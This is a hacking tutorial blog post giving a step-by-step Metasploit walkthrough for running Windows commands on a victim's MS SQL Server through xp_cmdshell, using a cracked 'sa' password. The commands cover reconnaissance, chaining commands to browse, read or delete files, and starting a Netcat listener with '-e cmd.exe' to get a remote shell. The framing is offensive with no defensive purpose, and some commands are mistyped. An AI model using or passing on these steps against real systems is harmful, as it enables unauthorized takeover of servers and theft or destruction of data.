CMD Command From an online MS SQL Server

CMD Command From an online MS SQL Server.
  
                                                                                               BY.MICKY VERMA

If we can execute CMD commands on the victim system, we cannot only run reconnaissance on it, but we can also own it with enough knowledge of the system and knowledge of Windows commands.

Step 1: Open a Terminal

To start, as usual, fire up Kali and open a terminal.

Step 2: Open Metasploit

Let's start the Metasploit console by typing:

kali > msfconsole

This should open a console that looks similar to this.

Step 3: Load the Auxiliary Module

Now, we need to load the msql_exec auxiliary module.

msf > use auxiliary/admin/mssql/mssql_exec

Now that we have loaded the module, let's take a look at the info page for it. Type:

msf > info

As you can see below, we have several key variables we have to set including CMD, RHOST, and PASSWORD.

In this case, I set the RHOST to the IP of the database server, the PASSWORD to the "sa" account password that I cracked earlier (nullbyte), and command I want to run on the command shell on the server, in this case, 'dir' to get a directory listing. Make certain that the command is between single quotation marks.

When these variables have been set, simply type "run."

msf > run

This module will access the xp_cmdshell stored procedure, even though it is disabled, and return the results of the command.

As you can see, this command has been sent to the xp_cmdshell and executed the dir on the underlying server. The output is a directory listing from the C:\WINDOWS\system32 directory.

Step 4: Use the SP for Reconnaissance

To do a bit of reconnaissance on this server, we could send a "netstat" to the server to see all the connections to the system.

msf > set CMD 'netstat'

msf > run

Step 5: Send Multiple Commands

Sending single commands is all well and good, but there is not a lot of significant actions we can do with a single command with the exception of maybe a file deletion (del). We can send multiple commands by simply putting "&" in-between the commands, such as:

msf > set CMD 'cd \ & dir'

Now, when we run this module, it should change directories to the root directory on the Windows machine (C:) and then do a directory listing.

As you can imagine, we could travel throughout the directory structure in this way to find confidential or critical information and read or delete it.

Step 6: Run a Hidden Exe. File

You might have noticed that the system admin on the server has a Netcat executable in the root directory. They probably left it there for remote administration or other tasks. Now that we know it is there, we can run it from this module.

msf > set CMD 'cd \ & nc -L -p6996 -e cmd.exe'

This will change directory to the root directory where the Netcat resides and then open a Netcat listener (-L) on port 6996 (-p6996) and push a command shell through the listener. Let's try it.

It looks like it executed successfully. Now, let's try to connect to the listener with Netcat on our Kali system.

msf > ns 192.168.181.105 6996

Success! We now have command prompt on the remote system and we own it!

It's important to note that a knowledge of command line commands is key to being successful in this type of hack. Most of our tutorials here have focused on Linuxcommands, but Windows can be run successfully from the command line as well, especially with PowerShell. To do so, you need to know these commands in Windows as well as Linux. Even the registry can be altered from the command line!

I'll do a short tutorial in the near future on running Windows from the command line that should be helpful in this type of hack. So keep coming back, my hacker novitiates, as we explore the tools and techniques of the world's most valuable skill set—hacking!